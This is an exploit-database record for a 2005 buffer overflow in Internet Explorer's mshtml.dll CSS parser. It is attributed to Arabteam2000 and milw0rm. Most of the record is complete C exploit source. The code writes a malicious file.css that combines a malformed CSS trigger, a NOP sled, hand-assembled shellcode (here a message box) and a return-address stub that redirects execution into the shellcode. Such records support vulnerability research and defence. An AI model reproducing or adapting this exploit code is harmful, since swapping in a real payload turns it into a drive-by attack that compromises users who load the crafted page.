Description
Microsoft Internet Explorer - mshtml.dll CSS Parsing Buffer Overflow
{"lastseen": "2020-04-01T19:04:31", "references": [], "description": "\nMicrosoft Internet Explorer - mshtml.dll CSS Parsing Buffer Overflow", "edition": 1, "reporter": "Arabteam2000", "exploitpack": {"type": "remote", "platform": "windows"}, "published": "2005-03-09T00:00:00", "title": "Microsoft Internet Explorer - mshtml.dll CSS Parsing Buffer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2005-03-09T00:00:00", "id": "EXPLOITPACK:D375800FD1BF4812D3267F31CC13855D", "href": "", "viewCount": 4, "sourceData": "/* \nTaken from http://www.securiteam.com/exploits/5NP042KF5A.html \n\nThe exploit will create a .CSS file that should be included \nin an HTML file. When a user loads the HTML file, Internet \nExplorer will try to parse the CSS and will trigger the \nbuffer overflow. \n*/\n\n//Exploit Code:\n#include <stdio.h>\n#include <string.h>\n#include <tchar.h>\n\nchar bug[]=\n\"\\x40\\x63\\x73\\x73\\x20\\x6D\\x6D\\x7B\\x49\\x7B\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3A\\x20\\x22\\x22\\x3B\\x2F\"\n\"\\x2A\\x22\\x20\\x22\\x2A\\x2F\\x7D\\x7D\\x40\\x6D\\x3B\\x40\\x65\\x6E\\x64\\x3B\\x20\\x2F\\x2A\\x22\\x7D\\x7D\\x20\\x20\\x20\";\n\n//////////////////////////////////////////////////////\n/*\nshellcode :MessageBox (0,\"hack ie6\",0,MB_OK);\n-\nXOR EBX,EBX\nPUSH EBX ; 0\nPUSH EBX ; 0\nADD AL,0F\nPUSH EAX ; Msg \" Hack ie6 \"\nPUSH EBX ;0\nJMP 746D8E72 ;USER32.MessageBoxA\n*/\n\nchar shellcode[]= \"\\x33\\xDB\\x53\\x53\\x04\\x0F\\x50\\x53\\xE9\\xCB\\x8D\\x6D\\x74\"\n\"\\x90\\x90\\x48\\x61\\x63\\x6B\\x20\\x69\\x65\\x36\\x20\\x63\\x73\\x73\";\n\n\n////////////////////////////////////////////////////////\n// return address :: esp+1AC :: start shellcode\n//MOV EAX,ESP\n//ADD AX,1AC\n//CALL EAX\n\nchar ret[]= \"\\x8B\\xC4\\x66\\x05\\xAC\\x01\\xFF\\xD0\";\n\nint main(int argc, char* argv[])\n{\n\n 
char buf[8192];\n FILE *cssfile;\n int i;\n\n printf(\"\\n\\n Internet Explorer(mshtml.dll) , Cascading Style Sheets Exploit \\n\");\n printf(\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\");\n printf(\" Coded by : Arabteam2000 \\n\");\n printf(\" Web: www.arabteam2000.com \\n\");\n printf(\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\\n\");\n\n // NOP`s\n for(i=0;i<8192;i++)\n buf[i]=0x90;\n\n\n // bug\n memcpy((void*)&buf[0],\n (void*)&bug,48);\n\n // shellcode\n memcpy((void*)&buf[100],\n (void*)&shellcode,27);\n\n // ret address\n memcpy((void*)&buf[8182],\n (void*)&ret,8);\n\n\n cssfile=fopen(\"file.css\",\"w+b\");\n if(cssfile==NULL){\n printf(\"-Error: fopen \\n\");\n return 1;\n }\n\n fwrite(buf,8192,1,cssfile);\n printf(\"-Created file: file.css\\n ..OK\\n\\n\");\n\n fclose (cssfile);\n return 0;\n}\n\n// milw0rm.com [2005-03-09]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645484494, "score": 1659818015}, "_internal": {"score_hash": "95cc6c1ec2da1d7e2dcccc649ced4901"}}